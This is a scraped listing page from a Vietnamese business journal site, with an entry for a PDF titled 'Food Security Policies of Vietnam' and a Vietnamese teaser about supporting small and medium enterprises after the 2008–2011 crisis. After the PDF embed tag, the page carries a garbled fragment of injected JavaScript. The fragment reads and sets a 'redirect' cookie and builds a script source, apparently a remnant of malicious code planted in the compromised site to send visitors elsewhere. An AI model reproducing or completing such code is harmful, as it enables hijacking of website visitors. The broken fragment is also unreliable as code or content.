Tạp chí HSB | Khoa Quản Trị và Kinh doanh - Đại học Quốc gia Hà Nội

Food Security Policies of Vietnam

{edocs}/docs/Ipsard_Food Security Policies of Vietnam.pdf,100%,868{/edocs} {var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

By hsbadmin01 | Tạp chí HSB
DETAIL

Lựa chọn giải pháp hỗ trợ doanh nghiệp nhỏ và vừa Việt Nam vượt qua khủng hoảng

Các doanh nghiệp nhỏ và vừa (DNNVV) chiếm hơn 95% trên tổng số 400.000 DNVN có đăng ký nộp thuế tính đến hết 12/2011. Do khủng hoảng kinh tế – tài chính toàn cầu 2008-2011 cùng với nhiều nguyên nhân khách quan và chủ quan

By hsbadmin01 | Tạp chí HSB
DETAIL